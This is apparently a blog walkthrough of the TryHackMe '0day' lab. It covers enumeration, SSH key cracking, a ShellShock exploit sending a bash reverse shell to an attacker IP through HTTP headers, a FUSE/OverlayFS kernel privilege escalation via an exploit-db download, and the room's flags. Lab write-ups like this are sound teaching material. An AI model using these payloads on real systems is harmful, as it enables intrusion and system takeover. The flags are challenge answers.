TryHackMe | 0day

In this walkthrough, I demonstrate how I obtained complete ownership of the 0day room on TryHackMe
TryHackMe | 0day
In: TryHackMe, Attack, CTF

Nmap Results

# Nmap 7.94SVN scan initiated Sat Apr 13 01:37:04 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.10.66.168
Nmap scan report for 10.10.66.168
Host is up (0.076s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0day
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 13 01:37:50 2024 -- 1 IP address (1 host up) scanned in 45.60 seconds





Service Enumeration

TCP/80

Gobuster Enumeration

Directory and File Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -x php,html,txt -o gobuster-80.txt
/admin                (Status: 301) [Size: 311] [--> http://10.10.66.168/admin/]
/backup               (Status: 301) [Size: 312] [--> http://10.10.66.168/backup/]
/cgi-bin              (Status: 301) [Size: 313] [--> http://10.10.66.168/cgi-bin/]
/cgi-bin/             (Status: 403) [Size: 287]
/cgi-bin/.html        (Status: 403) [Size: 292]
/css                  (Status: 301) [Size: 309] [--> http://10.10.66.168/css/]
/img                  (Status: 301) [Size: 309] [--> http://10.10.66.168/img/]
/index.html           (Status: 200) [Size: 3025]
/js                   (Status: 301) [Size: 308] [--> http://10.10.66.168/js/]
/robots.txt           (Status: 200) [Size: 38]
/robots.txt           (Status: 200) [Size: 38]
/secret               (Status: 301) [Size: 312] [--> http://10.10.66.168/secret/]
/server-status        (Status: 403) [Size: 292]
/uploads              (Status: 301) [Size: 313] [--> http://10.10.66.168/uploads/]



/backup/

/backup/ contains a password-protected SSH private key, let's keep this handy for later
curl -s http://10.10.66.168/backup/ -o ssh_key.pem
chmod 400 ssh_key.pem

Save the file locally

ssh2john ssh_key.pem > ssh_key_hash

Generate a hash to crack the SSH key password

john --wordlist=rockyou.txt ssh_key_hash

Crack the hash



Enumerating Some More

ℹ️
I do not yet have a username that I can pair with this SSH key, so we'll have to hunt around for additional subdirectories and files.

I enumerated /secret/, /uploads/, /backup/, and /admin/ with common file extensions based on what I thought would be in the directory. However, I didn't have any luck finding anything.

And even though the /cgi-bin/ directory is forbidden to us, it's a good idea to check here for any scripts that might be available. CGI scripts may take user input and parse it on the server, which could lead to remote code execution (RCE)

gobuster dir -u http://$target/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -x sh,py,rb,cgi -o gobuster-80_cgibin.txt
/test.cgi             (Status: 200) [Size: 13]

Interesting...

CGI | HackTricks | HackTricks

Searching Google for CGI exploits, this article comes up with some good ideas

it looks like this CGI script is vulnerable to ShellShock
HackTheBox | Shocker
HackTheBox | Shocker

I'll just use my POC from here





Exploit

The CGI script on the target is vulnerable to the ShellShock vulnerability, which executes a user-controlled function due to a specially-crafted set of characters in some HTTP headers. The server administrator must update the underlying operating system to resolve this issue or disable the CGI script.

Test command execution

To get a shell on the machine should be as simple as changing the payload in the PWN variable from before.

PWN="() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACK_IP/$ATTACK_PORT 0>&1 &'"

Change the payload

sudo rlwrap nc -lnvp 80

Start a listener on port 80

curl http://10.10.66.168/cgi-bin/test.cgi \
-H "User-Agent: $PWN" \
-H "Cookie: $PWN" \
-H "Referer: $PWN" -v

Run the payload against the target CGI script





Post-Exploit Enumeration

Operating Environment

OS & Kernel

NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sorry, user www-data may not run sudo on ubuntu.    



Users and Groups

Local Users

ryan:x:1000:1000:Ubuntu 14.04.1,,,:/home/ryan:/bin/bash    

Local Groups

ryan:x:1000:    



Network Configurations

Network Interfaces

2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:8e:e4:9b:36:1f brd ff:ff:ff:ff:ff:ff
    inet 10.10.66.168/16 brd 10.10.255.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::8e:e4ff:fe9b:361f/64 scope link 
       valid_lft forever preferred_lft forever    



Interesting Files

/home/.secret

lrwxrwxrwx  1 root root   14 Sep  2  2020 .secret -> /root/root.txt   





Privilege Escalation

After hunting around for a good bit, I didn't spot much in the way of misconfigurations or interesting files that might leak some data that could be used to pivot to another user. So, I decided to focus on the fact that this host operating system is very old.

This host may be vulnerable FUSE OverlayFS privilege escalation

The kernel version and operating system version of this host definitely line up with the comments in the exploit POC.

We can see that FUSE is installed on the target
'gcc' is also installed so we can compile locally
curl https://www.exploit-db.com/raw/37292 -o pwn.c
sudo python3 -m http.server 80

Download the exploit locally and host it

File downloaded locally
gcc is complaining that it can't find a dependency, but it is installed
What are the Default $PATH Values?
On Mac OS X, the default $PATH values are: /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin What are the default values on Linux?

I suspect this might be a PATH issue with the 'www-data' user

export PATH='/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games'
Nice! No compilation errors!
We are root!



Flags

User

THM{Sh3llSh0ck_r0ckz}    

Root

THM{g00d_j0b_0day_is_Pleased}    
More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.